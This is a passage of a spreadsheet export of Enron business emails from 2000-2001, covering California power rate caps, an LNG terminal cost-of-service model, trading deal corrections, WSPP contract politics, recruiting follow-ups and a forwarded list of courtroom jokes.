6.1 cents      Power Supply portion, of which 1/4 was purchased power @ 3.0 _x000D_
cents and 3/4 was generation @9.1 cents._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Steven J Kean@ENRON_x000D_
09/01/2000 08:27 AM_x000D_
Sent by: Steven J Kean@ENRON_x000D_
To: Susan J Mara/SFO/EES@EES, Jeff Dasovich/SFO/EES@EES, Sandra _x000D_
McCubbin/SFO/EES@EES, Mona L Petrochko/SFO/EES@EES_x000D_
cc: Gavin Dillingham/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Harry _x000D_
Kingerski/HOU/EES@EES, Richard Shapiro/HOU/EES@EES, James D _x000D_
Steffes/HOU/EES@EES _x000D_
Subject: California Lawmakers Vote to Limit Power Costs - WSJ_x000D_
_x000D_
Look at this.  Baum finally speaks up  -- way too late._x000D_
Can somebody tell me what SDG&amp;E's energy rate was pre-dereg?_x000D_
---------------------- Forwarded by Steven J Kean/NA/Enron on 09/01/2000 _x000D_
08:24 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Ann M Schmidt                           09/01/2000 07:57 AM_x000D_
	_x000D_
_x000D_
To: Karen Denne/Corp/Enron@ENRON, Mark Palmer/Corp/Enron@ENRON, Steven J _x000D_
Kean/NA/Enron@Enron, Meredith Philipp/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: California Lawmakers Vote to Limit Power Costs - WSJ_x000D_
_x000D_
F.Y.I._x000D_
_x000D_
                              _x000D_
  California Lawmakers Vote to Limit Power Costs _x000D_
  By Rebecca Smith _x000D_
    _x000D_
  09/01/2000 _x000D_
  The Wall Street Journal _x000D_
  Page A4 _x000D_
  (Copyright (c) 2000, Dow Jones &amp; Company, Inc.) _x000D_
_x000D_
  California lawmakers voted to extend modest relief to San Diego residents _x000D_
burdened with_x000D_
  high electricity bills and set the groundwork for faster construction of _x000D_
badly needed power_x000D_
  plants. They stopped short, however, of passing legislation that would roll _x000D_
back retail power_x000D_
  rates to levels seen prior to deregulation ._x000D_
_x000D_
  Late Wednesday, lawmakers sent a bill to Gov. Gray Davis that limits to 6.5 _x000D_
cents per_x000D_
  kilowatt hour the amount that small customers of San Diego Gas &amp; Electric _x000D_
Co. can be_x000D_
  charged. The utility is allowed to add power-delivery and other reasonable _x000D_
costs to that_x000D_
  commodity price._x000D_
_x000D_
  The price, equivalent to a bulk power cost of $65 per megawatt hour, is far _x000D_
higher than the_x000D_
  average price of power for 27 of the 31 months in which California's market _x000D_
has been_x000D_
  deregulated. But in June and July, the average price of power obtained by _x000D_
the utility from a_x000D_
  state-sanctioned energy auction rose to 12 cents and 10.5 cents, _x000D_
respectively, compared_x000D_
  with the 2.3 cents and 2.8 cents charged in those months a year earlier._x000D_
_x000D_
  Passed directly through to customers,the resulting bills sparked a near _x000D_
mutiny. The_x000D_
  rate-cap measure applies to residential and small commercial customers, as _x000D_
well as to_x000D_
  schools and hospitals._x000D_
_x000D_
  In addition to the rate cap, which can be adjusted upward or downward by _x000D_
the California_x000D_
  Public Utilities Commission until December 2002, the legislature earmarked _x000D_
$150 million of_x000D_
  general-fund revenue, which can be used to subsidize San Diego power costs _x000D_
if they greatly_x000D_
  exceed the 6.5-cents-per-kilowatt-hour rate. For now, the utility would be _x000D_
expected to make_x000D_
  up any difference between revenue collected and the actual cost._x000D_
_x000D_
  Steve Baum, chairman of Sempra Energy, parent of San Diego Gas &amp; Electric _x000D_
Co., said the_x000D_
  rate-cap measure is "deeply flawed" because it limits the amount prices can _x000D_
rise but sets_x000D_
  no floor. That means any shortfall could grow -- without a mechanism for _x000D_
customers to pay_x000D_
  it down -- until the end of the rate-cap period, which could last until _x000D_
December 2002 or_x000D_
  December 2003._x000D_
_x000D_
  Mr. Baum said Sempra stands to suffer an undercollection of perhaps $664 _x000D_
million, provided_x000D_
  future prices approximate the New York Mercantile Exchange forward prices _x000D_
through_x000D_
  December 2002. "It's irreparably damaging to Sempra," he said because it _x000D_
"creates_x000D_
  tremendous uncertainty" that makes it hard for the San Diego energy company _x000D_
to finance_x000D_
  new projects such as a new transmission line._x000D_
_x000D_
  The legislature also appeared likely to approve a bill speeding up the _x000D_
permit process for the_x000D_
  construction of new power plants, in part by beefing up staffs of _x000D_
regulatory agencies that_x000D_
  review the plans. _x000D_
_x000D_
_x000D_
                                                  _x000D_
_x000D_
  Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
  _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 25 Feb 2001 17:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'les.webber@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'james.mcmillan@enron.com'})</t>
  </si>
  <si>
    <t>Re: ELBA ISLAND LNG TERMINAL - Cost of Service</t>
  </si>
  <si>
    <t>JAMES:_x000D_
_x000D_
Thank you very much for your comments._x000D_
_x000D_
I would like to take the following actions in regard to this information:_x000D_
_x000D_
I would like to schedule a meeting with you and one or both of Todd Peterson and Tony Galt as soon as conveniently possible Monday, February 26 to discuss these and related issues.  I will ask Kathleen to schedule the meeting._x000D_
_x000D_
I would like you to take the lead in following up on a number of matters with Southern LNG (SLNG) and El Paso Merchant Energy (EPME).  I think you should do this verbally, with follow-up written confirmation.  Please ensure that we direct all correspondence to the proper corporate entities.  For example, FERC compliance matters should be addressed to El Paso Merchant Energy, with a copy to Southern LNG.  Correspondence directed to Southern LNG would have to deal with matters related to the Quality Letter Agreement or be in answering requests they direct to us._x000D_
_x000D_
I would like you to keep both Eric Groves and Rod Hayslett up to date on all cost related matters, so that the cost of service model being developed by Rod Hayslett and being incorporated into Eric Groves economics model is as accurate as possible.  When Rod transfers his COS model to Eric, we should be able to reduce our communications with Rod to an "as-required" basis._x000D_
_x000D_
_x000D_
You have made some excellent points in your note, and I believe we need to follow up on several of them, i.e._x000D_
spare parts - we have used the information supplied by Southern LNG, with the exception of the stripping facilities.  I think you are right.  I think we should include your estimates in the COS model.  However, I would not raise this with EPME/SLNG - we can discuss it at the time of the True-Up filing by SLNG._x000D_
O&amp; M costs - in April 2000, SLNG did add to their fixed O&amp;M costs, but not their variable ones.  I think the information supplied by SLNG in late 2000 does pick up increased O&amp;M costs (in the fixed portion of the COS) and increased power costs.  I believe they have deliberately held the variable O&amp;M costs at the same level as in April 2000 (by putting the increase in fixed O&amp;M)._x000D_
I think you should formalize a request to EPME. copy to SLNG, around dredging maintenance costs, broken out by category (i.e. berth, channel, proposed new turning basin, old turning basin, etc.)_x000D_
I cannot find the $2,750,000 figure in your fifth point.  I have never tried to estimate maintenance dredging costs._x000D_
Your sixth point is one I had not even thought about - and you are right.  I forgot about the tug pilots.  I would like you to raise this issue with EPME, copy to SLNG.  If the pilots are on board 24 hours per day, 365 days per year (to escort 30 to 40 vessels past the dock each day, then I believe your cost estimate is too low._x000D_
We definitely need to include the EPME liquids stripping model economics in the COS model as one key alternative to handle high Btu content LNG.  Therefore, we need to ensure we obtain an as-accurate-as-possible assessment of all the costs.  The model will have the capability to handle several alternatives in this regard._x000D_
_x000D_
_x000D_
I would also like to discuss the following matters at the Monday meeting:_x000D_
status of the British Gas marine study in general;_x000D_
status of our initial views on Phase I of the British Gas marine study;_x000D_
plans to deal with early release of study results to SLNG;_x000D_
understanding of the marine consultant's conclusions around the two-tug-escort possibility (e.g. where would the tugs be located?  Would they tie onto the vessels?);_x000D_
other ramifications of the "escort" proposal (liability, risk, insurance, owners' reaction, FERC-imposed-requirement versus USCG);_x000D_
USCG preliminary report;_x000D_
Enron initiatives with the USCG, tug owners, pilots, etc. everywhere on the ship side of the unloading flange; and_x000D_
other (as may be brought forward)._x000D_
_x000D_
_x000D_
Until Monday!_x000D_
Les_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
James McMillan_x000D_
02/25/2001 10:50 AM_x000D_
To:	Les Webber/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:	 _x000D_
_x000D_
Subject:	Re: ELBA ISLAND LNG TERMINAL - Cost of Service   _x000D_
_x000D_
Les,_x000D_
_x000D_
I have the following comments on your attached Cost of Service Model:_x000D_
_x000D_
Assume that AFUDC is essentially "Interest during Construction," at a rate of 10%._x000D_
Suspect that $9,739,130 Stabilization (Air or N2) Cost provided by Southern LNG on April 3, 2000 does not include spare parts, which would increase parts by about 2%, i.e. $195,000.  This system would also increase O&amp;M Costs: Fixed Cost - 0 (assume no increase in staff); Variable O&amp;M - $100,000 (Swag for Maintenance Cost);  Electric Power by $530,000 per year (6000 hp operating 1/3 of time) _x000D_
Question to SLNG, does their $2,450,000/hr Variable O&amp;M include maintenance dredging of the Dock &amp; Turning Basin?_x000D_
August 2000 - same comment on spare parts as item 2 above, increase Spares by 2% times incremental capital cost:  $300000/yr for 3.8% Air and $440,000 for N2 injection_x000D_
FERC Environmental SWAGs for Capital Cost look OK.  Assume your $2,750,000 Fixed O&amp;M Cost is for Maintenance Dredging; camera maintenance will be negligible  Spare parts would only apply to camera surveillance, which is negligible._x000D_
Stand by Tugs cost does not include standby tug pilots.  Add another $200,000 (SWAG) per year for them._x000D_
Stripping Alternative - shouldn't we be using El Paso Energy's latest proposal here?  i.e. the $34.5 MM proposal (Scaled up to $54 MM for contingency, owner's cost and interest during construction, plus another $0.5 to $5.0 for export facilities) with another $2.4 MM/hr for O&amp;M?_x000D_
_x000D_
Regards_x000D_
James_x000D_
_x000D_
_x000D_
_x000D_
Les Webber_x000D_
_x000D_
02/19/2001 05:42 PM_x000D_
To:	Rod Hayslett@ENRON, Eric Groves@ECT, Lisa Yoho@Enron, James McMillan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:	 _x000D_
_x000D_
Subject:	ELBA ISLAND LNG TERMINAL - Cost of Service_x000D_
_x000D_
Greetings:_x000D_
_x000D_
I am attaching my Excel spreadsheet that takes you through the various iterations of the capital expenses and cost-of-service calculations for the Elba Island LNG Terminal.  I have included certain "estimate" information that reflects my attempt to derive cost-of-service information to augment what Southern LNG has provided._x000D_
_x000D_
Rod Hayslett has kindly agreed to develop the proper algorithm to more accurately calculate this information and to work with Eric Groves on integrating this as a module in Eric's LNG economic evaluation model for the Atlantic Basin.  I believe we will need this in order to analyze the proposals that we expect to receive from El Paso Merchant Energy this week._x000D_
_x000D_
I would also like James McMillan to take a look at the commodity charges and electric power rates for the nitrogen injection, air injection and gas liquids stripping cases, as well as at the fixed O&amp;M costs.  Some updating of the "estimate" information is likely needed._x000D_
_x000D_
I will send copies of the relevant background information received from Southern LNG to each of you.  In addition, I will be sending out a general memo to a wider audience with the attached spreadsheet._x000D_
_x000D_
Regards._x000D_
Les Webber_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;Embedded StdOleLink&gt;</t>
  </si>
  <si>
    <t>Sun, 23 Dec 2001 17:16:33 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bmark.blackdiamond@mobile.rogers.com'})</t>
  </si>
  <si>
    <t>Happy holiday</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Mark,_x000D_
_x000D_
I'm off to Florida for one week   and then down to Caribean for another week of Vacation with my family and want to wish you and your family a happy holiday and a new year filled with much health,wealth,love,happiness and the time to enjoy them all_x000D_
_x000D_
Bob_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 08:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: deal 574356</t>
  </si>
  <si>
    <t xml:space="preserve">o.k. thanks_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                04/09/2001 02:55 PM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: deal 574356_x000D_
  _x000D_
_x000D_
I've added the fee - these are supposed to default when traders enter the _x000D_
deals in Enpower, but for some reason Bloomberg fees aren't coming through _x000D_
lately. I'm checking with IT on this._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
PS - I'll add you to the Deal Correction Report mail list starting today._x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
04/09/2001 12:59 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: deal 574356_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
deal 574356_x000D_
Jeff Richter_x000D_
Kate Bloomberg shows a fee of .005 on this deal and we show no fee._x000D_
_x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Nov 2001 08:47:27 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jim.buerkle@enron.com', 'paul.choi@enron.com', 'stewart.rosman@enron.com', 'john.malowney@enron.com', 'chris.lackey@enron.com', 'john.van@enron.com'})</t>
  </si>
  <si>
    <t>FW: WSPP Proposal</t>
  </si>
  <si>
    <t>_x000D_
Here is a good example of exactly what I was talking about in our EEI/WSPP =_x000D_
comparison session yesterday.  Today and tomorrow the WSPP contract committ=_x000D_
ee is meeting in a palatial setting in southern California, many Club Membe=_x000D_
rs taking two and a half days off from their "busy" schedules to go there, =_x000D_
AG warnings of terrorism threats notwithstanding, and, what are they doing?=_x000D_
  they are discussing another piece of the EEI agreement and deciding wheth=_x000D_
er or not to adopt it, (which they will in a botched up form)  this particu=_x000D_
lar item is a Collateral Annex document, designed to strengthen the margin =_x000D_
taking aspect of the WSPP agreement.  Nobody can complain that this topic i=_x000D_
s not a relevant topic,  but,  what nobody seems to be noticing, as the yea=_x000D_
rs go by, is that this catch up side show by these guys is a big waste of t=_x000D_
he industry's time and money, and, the whole thing could be brought to a ti=_x000D_
dy ending by a Joint WSPP/EEI drafting Committee.  Why should the market be=_x000D_
 confused by having two agreements, one of which is forever amending itself=_x000D_
 to look ever more and more like the other, all the while pretending to be =_x000D_
vitally and significantly different?  The WSPP is like the Emperor's new cl=_x000D_
othes story.  It is proudly standing up there in front of the world but it =_x000D_
has nothing on,  it looks ever more like the very agreement it tries to be =_x000D_
different from.  This fundamental absurdity of creeping imitation needs to =_x000D_
be recognized for what it is. This really is our biggest beef against the W=_x000D_
SPP:  CREEPING IMITATION.   As mid-marketers, you could begin planting the =_x000D_
seed of the idea, (couching it all in very positive remarks about the wonde=_x000D_
rful efforts of the WSPP),  that we have made enought progress now and that=_x000D_
 the time for merger is upon us.  The solution is a joint drafting committe=_x000D_
e to harmonize the agreements once and for all.    If enough counterparties=_x000D_
 began talking about this, it might happen.  If we, as Enron lawyers bring =_x000D_
it up,  we are sarcastically dismissed for being cruel and unusual punisher=_x000D_
s of Mike Small.   Please think about this and factor it into your conversa=_x000D_
tions with counterparties. While you are doing that, we lawyers will have t=_x000D_
he pleasure of another four to 6 hours of phone conference work as the comm=_x000D_
ittee toils on, the comic and absurd road show entering at least its 4th ye=_x000D_
ar of this debacle.   ----cgy_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Sager, Elizabeth =20_x000D_
Sent:=09Thursday, November 01, 2001 8:02 AM_x000D_
To:=09Yoder, Christian; Hall, Steve C. (Legal)_x000D_
Subject:=09FW: WSPP Proposal_x000D_
_x000D_
This is Reliant's version - while I haven't read it I'm sure it is the best=_x000D_
 proposal yet._x000D_
_x000D_
_x000D_
Elizabeth Sager_x000D_
713-853-6349_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09ntillett@reliant.com@ENRON   On Behalf Of drusso@reliant.com_x000D_
Sent:=09Monday, October 29, 2001 5:08 PM_x000D_
To:=09lrgroff@aep.com; rosteen@powersrc.com; fmdutton@adep.com; Sager, Eliz=_x000D_
abeth; SStack@reliant.com_x000D_
Subject:=09WSPP Proposal_x000D_
_x000D_
_x000D_
     Attached is the most current draft WSPP Proposal and Cover Sheet._x000D_
_x000D_
     Give me your comments/thoughts._x000D_
_x000D_
_x000D_
Dede Russo_x000D_
Senior Attorney_x000D_
Reliant Energy Law Department_x000D_
P.O. Box 1384_x000D_
Houston, TX  77251-1384_x000D_
1111 Louisiana St., Suite 4300 (77002)_x000D_
Phone: (713) 207-5240_x000D_
E-Mail: drusso@reliant.com_x000D_
Fax: (713) 207-0161_x000D_
_x000D_
_x000D_
(See attached file: WSPP Collateral Annex 102901.doc)        (See attached_x000D_
file: WSPP Collateral Annex Cover Sheet 102901.doc)_x000D_
_x000D_
_x000D_
_x000D_
The preceding e-mail message contains information that is confidential, may_x000D_
be protected by the attorney/client or other applicable privileges, and may_x000D_
constitute non-public information.  It is intended to be conveyed only to_x000D_
the designated recipient(s).  If you are not an intended recipient of this_x000D_
message, please do not read, copy or disclose the contents of this_x000D_
communication to others and please notify the sender at (713) 207-5241.  If_x000D_
you are not the intended recipient, we would appreciate your forwarding the_x000D_
message back to us and deleting it from your system. Unauthorized use,_x000D_
dissemination, distribution, or reproduction of this message is strictly_x000D_
prohibited and may be unlawful.  Thank you._x000D_
 - WSPP Collateral Annex 102901.doc=20_x000D_
 - WSPP Collateral Annex Cover Sheet 102901.doc</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 00:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Appointment Declined - EB3902 - Discussion 2001 ETS Project_x000D_
 controls (PAF)</t>
  </si>
  <si>
    <t>Tentative_x000D_
In Saunders office_x000D_
Discuss project finanical control procedures, and other operations admin. _x000D_
accounting items; as time permits</t>
  </si>
  <si>
    <t>Tue, 17 Oct 2000 11:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Interview- 10/4</t>
  </si>
  <si>
    <t xml:space="preserve">Irfan was one of the UT students, not OU.  Just wanted to make sure that we _x000D_
have him on the right list.  _x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Lexi Elliott @ ENRON                           10/17/2000 04:59 PM_x000D_
	_x000D_
_x000D_
To: Sally Beck/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Interview- 10/4  _x000D_
_x000D_
Sally:_x000D_
Thank you for forwarding this information to me.  I instructed the candidates _x000D_
on campus that we would be in touch with them within 2 weeks.  Actually, for _x000D_
OU students, I will be calling them personally tomorrow to let them know _x000D_
their status.  Their invitation letters will be sent shortly thereafter._x000D_
_x000D_
Thanks!_x000D_
_x000D_
lexi_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Sally Beck @ ECT                           10/17/2000 04:38 PM_x000D_
	_x000D_
_x000D_
To: Lexi Elliott/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Interview- 10/4_x000D_
_x000D_
As of Friday, October 13, it seems that this student had not heard back from _x000D_
Enron.  What is the timeline for getting back to students regarding Super _x000D_
Saturday?  _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 10/17/2000 04:36 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Irfiman@aol.com on 10/13/2000 01:15:38 AM_x000D_
To: &lt;sally.beck@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Interview- 10/4_x000D_
_x000D_
_x000D_
Dear Ms. Beck,_x000D_
_x000D_
I want to thank you for interviewing me for the analyst position last week.  _x000D_
I enjoyed meeting you and learning about your work.  My enthusiasm for the _x000D_
position and my interest in working for Enron were strengthened as a result _x000D_
of the interview._x000D_
_x000D_
I believe that my background and experience fit nicely with the job _x000D_
requirements, and I am sure that I could make a significant contribution to _x000D_
the firm.  I have not heard back yet and would appreciate any information you _x000D_
can give._x000D_
_x000D_
Thank You,_x000D_
_x000D_
Irfan Iqbal_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Jul 2000 02:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">You guys should enjoy this--especially the last one.   Reed, you never called _x000D_
back you wimpy Pantani butt pirate.  I've got a big case settling and am more _x000D_
likely going to have a shot at blasting out for a couple days of fishing.  _x000D_
Let me know whether fishing is worth a shit out there.  DF_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 07/21/2000 _x000D_
09:51 AM ---------------------------_x000D_
_x000D_
_x000D_
"Baird, Kate" &lt;Kbaird@FirstRate.com&gt; on 07/19/2000 10:09:35 AM_x000D_
To: "Drew Fossum [Drew_Fossum@enron.com] (E-mail)" &lt;Drew_Fossum@enron.com&gt;, _x000D_
"Steve Egert (E-mail)" &lt;Egert_Steve@emc.com&gt;, "Oyola, Jennie" _x000D_
&lt;JOyola@FirstRate.com&gt;, "Graham, Curt" &lt;CGraham@FirstRate.com&gt;, "Stone, Jud" _x000D_
&lt;JStone@FirstRate.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: FW:_x000D_
_x000D_
_x000D_
 _x000D_
Keep reading, some of these are really  funny!?And the last one is great!_x000D_
_x000D_
?_x000D_
----- Original Message -----  _x000D_
Subject: Fw: _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt; These are things people actually said in  court, word for word, taken _x000D_
&gt; down and now published by court reporters  who had the torment of _x000D_
&gt; staying calm while these exchanges were actually  taking place:_x000D_
&gt; _x000D_
&gt;  --------------------------------------------------------_x000D_
&gt; _x000D_
&gt; Q:  What is your date of birth?_x000D_
&gt; A: July fifteenth._x000D_
&gt; Q: What  year?_x000D_
&gt; A: Every year._x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: What  gear were you in at the moment of the impact?_x000D_
&gt; A: Gucci sweats and  Reeboks._x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: This  myasthenia gravis, does it affect your memory at all?_x000D_
&gt; A: Yes._x000D_
&gt; Q:  And in what ways does it affect your memory?_x000D_
&gt; A: I forget._x000D_
&gt; Q: You  forget. Can you give us an example of something that you've _x000D_
&gt;  forgotten?_x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: How  old is your son, the one living with you?_x000D_
&gt; A: Thirty-eight or  thirty-five, I can't remember which._x000D_
&gt; Q: How long has he lived with  you?_x000D_
&gt; A: Forty-five years._x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: What  was the first thing your husband said to you when he woke _x000D_
&gt; that  morning?_x000D_
&gt; A: He said, "Where am I, Cathy?"_x000D_
&gt; Q: And why did that  upset you?_x000D_
&gt; A: My name is Susan._x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: And  where was the location of the accident?_x000D_
&gt; A: Approximately milepost  499._x000D_
&gt; Q: And where is milepost 499?_x000D_
&gt; A: Probably between milepost  498 and 500._x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: Sir,  what is your IQ?_x000D_
&gt; A: Well, I can see pretty well, I think._x000D_
&gt;  _x000D_
&gt; ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt;  Q: Did you blow your horn or anything?_x000D_
&gt; A: After the accident?_x000D_
&gt; Q:  Before the accident._x000D_
&gt; A: Sure, I played for ten years. I even went to  school for it._x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: Do  you know if your daughter has ever been involved in voodoo or _x000D_
&gt; the  occult?_x000D_
&gt; A: We both do._x000D_
&gt; Q: Voodoo?_x000D_
&gt; A: We do._x000D_
&gt; Q:  You do?_x000D_
&gt; A: Yes, voodoo._x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q:  Trooper, when you stopped the defendant, were your red and blue _x000D_
&gt; lights  flashing?_x000D_
&gt; A: Yes._x000D_
&gt; Q: Did the defendant say anything when she got  out of her car?_x000D_
&gt; A: Yes, sir._x000D_
&gt; Q: What did she say?_x000D_
&gt; A:  What disco am I at?_x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: Now  doctor, isn't it true that when a person dies in his sleep, he _x000D_
&gt; doesn't  know about it until the next morning?_x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: The  youngest son, the twenty-year old, how old is he?_x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: Were  you present when your picture was taken?_x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: So  the date of conception (of the baby) was August eighth?_x000D_
&gt; A: Yes._x000D_
&gt;  Q: And what were you doing at that time?_x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: She  had three children, right?_x000D_
&gt; A: Yes._x000D_
&gt; Q: How many were  boys?_x000D_
&gt; A: None._x000D_
&gt; Q: Were there any girls?_x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: You say  the stairs went down to the basement?_x000D_
&gt; A: Yes._x000D_
&gt; Q: And these  stairs, did they go up also?_x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: How  was your first marriage terminated?_x000D_
&gt; A: By death._x000D_
&gt; Q: And by whose  death was it terminated?_x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: Can  you describe the individual?_x000D_
&gt; A: He was about medium height and had a  beard._x000D_
&gt; Q: Was this a male, or a female?_x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: Is  your appearance here this morning pursuant to a deposition _x000D_
&gt; notice which  I sent to your attorney?_x000D_
&gt; A: No, this is how I dress when I go to  work._x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q:  Doctor, how many autopsies have you performed on dead people?_x000D_
&gt; A: All my  autopsies are performed on dead people._x000D_
&gt; _x000D_
&gt;  +++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: All  your responses must be oral, OK? What school did you go to?_x000D_
&gt; A:  Oral._x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: Do  you recall the time that you examined the body?_x000D_
&gt; A: The autopsy started  around 8:30 p.m._x000D_
&gt; Q: And Mr. Dennington was dead at the time?_x000D_
&gt; A:  No, he was sitting on the table wondering why I was doing an _x000D_
&gt;  autopsy._x000D_
&gt; _x000D_
&gt;  +++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q: Are  you qualified to give a urine sample?_x000D_
&gt; _x000D_
&gt;  ++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
&gt; _x000D_
&gt; Q:  Doctor, before you performed the autopsy, did you check for a _x000D_
&gt;  pulse?_x000D_
&gt; A: No._x000D_
&gt; Q: Did you check for blood pressure?_x000D_
&gt; A:  No._x000D_
&gt; Q: Did you check for breathing?_x000D_
&gt; A: No._x000D_
&gt; Q: So, then  it is possible that the patient was alive when you began _x000D_
&gt; the  autopsy?_x000D_
&gt; A: No._x000D_
&gt; Q: How can you be so sure, Doctor?_x000D_
&gt; A:  Because his brain was sitting on my desk in a jar._x000D_
&gt; Q: But could the  patient have still been alive nevertheless?_x000D_
&gt; A: Yes, it is possible that  he could have been alive and practicing _x000D_
&gt; law  somewhere._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 07:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Congratulations!!!  Looking forward to your great ideas for the future!_x000D_
_x000D_
--Dorothy</t>
  </si>
  <si>
    <t>Thu, 21 Jun 2001 21:33:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>Mtg. w/Sally Beck &amp; Tom Gros Re: Commodity Logic EB 2801B</t>
  </si>
  <si>
    <t>Set up with Patti x-39106 &amp; Brenda x-31914</t>
  </si>
  <si>
    <t>Tue, 19 Dec 2000 01:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Consumers transportation capacity deal</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for offering your help.  See the draft confirmation that the desk _x000D_
prepared for our _x000D_
benefit, but, of course, it cannot be confirmed under the gas purchase/sales _x000D_
agreement._x000D_
_x000D_
As I mentioned, Sylvia Pollan is the trader and Deirdre McCaffrey is working _x000D_
with her._x000D_
_x000D_
Let me know what to do._x000D_
---------------------- Forwarded by Bob Bowen/HOU/ECT on 12/19/2000 09:16 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Ellen Wallumrod@ENRON_x000D_
12/18/2000 04:35 PM_x000D_
To: Bob Bowen/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
